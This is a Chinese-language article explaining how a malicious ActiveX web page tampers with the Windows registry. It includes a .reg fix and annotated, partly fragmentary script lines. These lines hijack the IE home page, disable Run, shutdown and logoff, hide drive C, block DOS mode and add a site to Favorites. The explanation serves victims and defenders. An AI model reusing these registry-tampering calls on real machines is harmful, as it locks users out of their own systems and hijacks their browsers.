瀏覽網頁註冊表被禁用

時間 2019-11-24

標籤瀏覽網頁註冊表被禁欄目 HTML 简体版

原文原文鏈接

瀏覽網頁註冊表被禁用

這是因爲註冊表 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值「DisableRegistryTools」被修改成「1」的緣故，將其鍵值恢復爲「0」便可恢復註冊表的使用。

解決辦法：用記事本程序創建以REG爲後綴名的文件，將下面這些內容複製在其中就能夠了：

           
           
           
           
            
            
            
            REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 「DisableRegistryTools」=dword:00000000

十、瀏覽網頁開始菜單被修改

這是最「狠」的一種，讓瀏覽者有生不如死的感受。瀏覽後不只有相似上面所說的那些症狀，還會有如下更悲慘的遭遇：

              
              
              
              
               
               
               
               1)禁止「關閉系統」 2)禁止「運行」 3)禁止「註銷」 4)隱藏C盤——你的C盤找不到了！ 5)禁止使用註冊表編輯器regedit 6)禁止使用DOS程序 7)使系統沒法進入「實模式」 8)禁止運行任何程序

原來，該網頁是有人利用Java技術製做的含有有害代碼的ActiveX網頁文件。爲讓更多的人瞭解其危害，查看其源代碼，將其主要部分列了出來，並加了詳細的註釋（文中有「注」字的部分註釋）。

注：下面代碼是將你的IE默認鏈接首頁改成[url]http://www.findfeel.com/[/url]

                 
                 
                 
                 
                  
                  
                  
                  Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\ Start Page", "http://www.findfeel.com/"）; 注：如下是該網頁修改受害者的註冊表項所用的招數 Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion \\Policies\\Explorer\\NoRun", 01, "REG_BINARY"）; 注：使受害者系統沒有「運行」項，這樣用戶就不能經過註冊表編輯器來修改該有害網頁對系統註冊表 的修改。 Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\Explorer\\NoClose", 01, "REG_BINARY"）; 注：使受害者系統沒有「關閉系統」項 Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"）; 注：使受害者系統沒有「註銷」項 Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"）; 注：使受害者系統沒有邏輯驅動器C Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\WinOldApp\\ Disabled","REG_BINARY"）; 注：禁止運行全部的DOS應用程序； Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\ \WinOldApp\\NoRealMode","REG_BINARY"）; 注：使系統不能啓動到「實模式」（傳統的DOS模式）下； 又注：進入該網頁，它還會修改如下的註冊表項，使WINDOWS系統登陸時顯示一個登陸窗口（在 MicroSoft網絡用戶登陸以前） Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ Winlogon\\LegalNoticeCaption", "嗚啦啦..."）; 注：這些代碼會使窗口的標題是「嗚啦啦…」 Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ Winlogon\\LegalNoticeText", "歡迎你！你這個超級無敵大白癡！《嗚啦啦...》故事開始了，按肯定 進入悲慘世界"）; 注：上面一行是會在窗口中顯示出來的文字 注：下面兩行代碼修改註冊表，使受害者全部的IE窗口都加上如下的標題：「嗚啦啦…」 Shl.RegWrite （"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\ Window Title", "嗚啦啦..."）; Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\ Window Title", "嗚啦啦..."）; 注：到上面一行爲止，完成了對受害者的註冊表的全部修改！ 注：下面代碼用來將其網頁增長到受害者的收藏夾中 var WF, Shor, loc; WF = FSO.GetSpecialFolder（0）; loc = WF + "\\Favorites"; if（!FSO.FolderExists（loc）） { loc = FSO.GetDriveName（WF） + "\\Documents and Settings\\ " + Net.UserName + "\\Favorites"; if（!FSO.FolderExists（loc）） { return; } } 注：下面就是使其網頁加入到你的收藏夾的具體代碼 AddFavLnk（loc, "找到感受[url]www.findfeel.com[/url]", "http://www.findfeel.com"）;